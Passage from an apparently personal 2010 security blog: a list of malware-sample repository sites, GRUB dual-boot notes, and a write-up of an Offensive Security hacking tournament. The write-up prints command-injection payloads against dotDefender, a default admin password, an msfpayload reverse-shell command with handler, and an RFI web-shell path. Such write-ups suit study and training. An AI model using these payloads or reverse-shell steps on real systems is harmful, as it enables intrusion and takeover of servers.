- http://www.malwaredomainlist.com/mdl.php
- http://support.clean-mx.de/clean-mx/viruses.php
- http://malc0de.com/database/
- http://lineage.paix.jp/guide/security/virus-lastmodified.html
- https://zeustracker.abuse.ch/monitor.php?browse=binaries
- http://www.sacour.cn/showmal.asp?month=8year=2010
- http://www3.malekal.com/exploit.txt
- http://blog.urlvoid.com/new-list-of-dangerous-websites-to-avoid
- http://www.freepcsecurity.co.uk
- http://www.scumware.org
- http://secuboxlabs.fr
- http://www.threatlog.com
- http://minotauranalysis.com/exetweet/
- http://jsunpack.jeek.org/dec/go?list=search&search=executable& (RSS feed)
- http://honeywhales.com/malware_samples/list (Japanese)
- http://blackip.ustc.edu.cn/bytime.html (Chinese)
- http://www.malwareint.com (various links in top bar)
- http://www.blade-defender.org/eval-lab (may not always be working - is auto-generated)
- http://www.malwareurl.com/ (free registration required)
- http://www.offensivecomputing.net/ (malware repository, free registration required to download)
- http://mdl.paretologic.com/index.php (registration required, including personal information)
- http://frame4.net (requires paid registration)
- http://vxvault.siri-urz.net/ViriList.php (password required, unknown at present)
Wednesday, 13 October 2010
List of Malware Sources
Command to watch tcp connection
watch -n 1 "netstat -tpanl | grep ESTABLISHED"
Saturday, 2 October 2010
backtrack4 and windows 7 dual boot
root (hd0,4)
makeactive
chainloader +1
root (hd0,3)
makeactive
chainloader +1
(hd0,3) = 'BOOTMGR' is missing '
root (hd0,2)
makeactive
chainloader +1
Wednesday, 23 June 2010
Offensive Security Hacking Tournament – Report How strong is your Fu
Introduction
Offensive security through a hacking tournament on online on the 9th to 10th may 2010.Total duration was predefine 48 hours.Registered contestant got basic information after login a blog post where the challenges describe.Basic challenges are in two phase following paragraph has the objective as putted on web.
“Phase 1″ – you must hack our noob filter machine and extract a file called n00bSecret.txt from the local filesystem. Once you have the key, you have 10 minutes to submit it into the control panel.
“Phase 2″ – The control panel will provide you with VPN files. Your VPN account will be automatically activated once you submit a correct “Phase 1″ secret key. It will take 5 minutes for your account to get activated.
This report contains sub-sections. Each Sub-section discusses in detail all relevant issues or avenues used to compromise and to gain unauthorized access to sensitive information.
Global Objectives
1. First objective is straight forward find a secret key is called n00bSecret.txt. two same target
- Noob filter 1 – http://www1.noob-filter.com (67.23.72.4)
- Noob filter 2 – http://www2.noob-filter.com (67.23.72.5)
2. Second goal is compromise two server with following hits and collect a secret key as proof
- FTP Credentials are : devil / killthen00b
- Internal VPN IP’s – 192.168.6.66/67/68 (all same) and 192.168.6.70/71/72 (all same).
after achieved the first goal its clear to distinguished two separated goal
2.1. 192.168.6.70/71/72 (name Kilthen00b)
2.2. 192.168.6.66/67/68 (name Ghost)
Global Objective Summary
Objective 1 : Achieved
Objective 2.1 : Achieved
Objective 2.1 : Not Completed (But collect some potential vulnerability on server)
Machine ip
Vulnerability Type
Risk / Impact
Objective 1 : Achieved
67.23.72.4
67.23.72.5
(find a secret key is called n00bSecret.txt.)
1. information leakage.
2. Weak Passwords identified
3. Remote Command execute.
1. CRITICAL
2. With executing remote command get full control on machine.
Objective 2.1 : Achieved
192.168.6.70/71/72 (name Kilthen00b)
1.Possible to execute *.exe(executable) file from web link.
1. CRITICAL
2. With a reverse shell can own full cotrol to machine.
Objective 2.1 : Not Completed
192.168.6.66/67/68 (Ghost)
(But collect some potential vulnerability on server)
1. With bruthforceing directory find some potentially vunarable data
1. CRITICAL
Details work flow how to gain objective
Objective 1 : Achieved 192.168.6.70/71/72
(find a secret key is called n00bSecret.txt.)
Only 80 port found open on this server(192.168.6.70) at the contest start moment 22 port found open but that closed after some moment.
With some raw http request ( nc -v 67.23.72.4 80) the box ox type and the web server is detected.
HEAD HTTP/1.0
HTTP/1.1 400 Bad Request
Date: Wed, 05 May 2010 04:53:59 GMT
Server: Apache/2.2.14 (Fedora)
Content-Length: 326
Connection: close
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.14 (Fedora) Server at host-67-23-72-4.biznesshosting.net Port 80</address>
</body></html>
HEAD HTTP/1.0
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.2.14 (Fedora) Server at host-67-23-72-4.biznesshosting.net Port 80</address>
</body></html>
And later on with tampering the post data found following output the red mark disclosed some information that help to proceed next.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Blocked Your Request</title>
<meta name="description" content="Applicure is the leading provider of web application security. We create products for web application protection, including web application firewall, ISA security and IIS security." />
<meta name="keywords" content="web application protection, web application firewall, isa security, iis security, web site security, web application security">
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<style type="text/css">
body{
margin: 0px;
font-family: Verdana, sans-serif;
font-size: 12px;
}
div#box{
width: 475px;
border: solid 1px #5183b4;
text-align: left;
}
h1{
font-size: 22px;
color: #D70637;
font-weight: bold;
text-align: center;
}
a{
color: black;
}
a:hover{
color: #5183b4;
}
</style>
</head>
<body><br />
<center>
HAHAHAHA!
</center>
</body>
</html>
Search with metadata string on google bring that this site protected by dotDefender (www.applicure.com) that has a public vurnabillity http://www.exploit-db.com/exploits/10261.
But the exploit only work after bypass basic Authentication login. And then got a weak password(admin/password) on http://67.23.72.4/dotDefender. then with exploit and help of hackerbar(add on firefox) can execute basic command in the target box.
first locate n00bSecret.txt
then cat the file to get the key.
on the hacker bar post http://67.23.72.4/dotDefender with
sitename=dotdefeater&deletesitename=dotdefeater;locate n00bSecret.txt;&action=deletesite&linenum=12
to locate the file and the post with
sitename=dotdefeater&deletesitename=dotdefeater;cat /opt/guid/n00bSecret.txt;&action=deletesite&linenum=12
Objective 2.1 : Achieved 192.168.6.70/71/72 (name Kilthen00b)
In this objective a FTP Credentials are ( devil / killthen00b ) are given . After vpn to lab with simple hit on http://192.168.6.70 with browser
a web mail portal found running on port 80.
a bit more digging found other port also open on that server
21/tcp open ftp
25/tcp open smtp
80/tcp open http
106/tcp open pop3pw
110/tcp open pop3
143/tcp open imap
366/tcp open odmr
465/tcp open smtps
587/tcp open submission
993/tcp open imaps
995/tcp open pop3s
3389/tcp open ms-term-serv
7025/tcp open unknown
7443/tcp open unknown
after more investigate on the top of browser this (http://192.168.6.70/scripts/webmail.exe) short of link make the sense that and exe can be run directly from the browser.Next with the ftp credential on the target server need to find out the scripts folder.
Welcome to SurgeMail (WebMail port)
The following are the main end user surgemail interface pages. You may want to place links to these on your main web pages:- A hotmail like interface for users to access email. (SSL Secure version)This page is ./surgemail/web/index.htm, you may want to tailor it, as users will see this page as the default page using the web interface on the webmail port.
- Web interface for account self management; change password, forwarding etc. (SSL Secure version)
- Web interface for domain administrators for creating new accounts, modifying passwords, forwarding rules etc.
Alternatively, to make webmail the default displayed page use the following surgemail configuration setting:
g_url_alias from="/" to="/scripts/webmail.exe" ports="80"
scripts directory found easily on the server.The next job is quite straight forward "put a reverse shell on scripts directory". To do this metasploit helps
/msfpayload windows/shell_reverse_tcp LHOST=192.168.6.198 LPORT=40867 X > /tmp/r.exe
puts the r.exe on target server and hit that from browser http://192.168.6.70/scripts/r.exe. On the other side a metasploit multi handler wait for connection back.
exploit/multi/handler
after getting a true shell now need to found the key have to submit on the game control panel.
c:\surgemail\scripts>cd c:
cd c:
c:\surgemail\scripts
c:\surgemail\scripts>cd ..
cd ..
c:\surgemail>cd ..
cd ..
c:\>cd user
c:\>cd users
cd users
c:\Users>cd Administrator
cd Administrator
c:\Users\Administrator>cd Desktop
cd Desktop
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0CDF-A146
Directory of c:\Users\Administrator\Desktop
05/03/2010 11:59 PM <DIR> .
05/03/2010 11:59 PM <DIR> ..
05/03/2010 11:59 PM 32 proof.txt
1 File(s) 32 bytes
2 Dir(s) 2,694,205,440 bytes free
c:\Users\Administrator\Desktop>type proof.txt
type proof.txt
a61b0c1bf71267289efeecf778b1e51e
Objective 2.1 : Not Completed
192.168.6.66/67/68 (Ghost)
(But collect some potential vulnerability on server)
No clue no xss no sql injection and aslo port scan not possible on this server.But with dirbuster by OWASP found some potential directory on server one of them is 192.168.6.66/1/ that contains a login page
with search some key word getting from the source of the login page is seems using
http://www.mariovaldez.net/software/sitefilo/
a bit more research found this (http://www.milw0rm.com/exploits/7444) public exploit that seems working
/1/slogin_lib.inc.php?slogin_path=[remote_txt_shell]
that indicate that this server also may vulnerable by RFI or LFI http://ha.ckers.org/blog/20100128/micro-php-lfi-backdoor/ attacker can upload web shell and command and control the server.
Conclusions
Its fun and get a nice experience to join this tournament.
Monday, 14 June 2010
Found Click jack attack from http://101hottestwomen.com on facebook
http://docs.google.com/View?id=dd5gk5hj_0hqm9rbhp
Sunday, 13 June 2010
All about exploit
| In this text we describe how to write a shellcode for new JIT-Spray attacks and make universal STAGE 0 shellcode that gives control to any common shellcode from MetaSploit, for example. Author: Alexey Sintsov http://www.dsecrg.com/files/pub/pdf/Writing%20JIT-Spray%20Shellcode%20for%20fun%20and%20profit.pdf |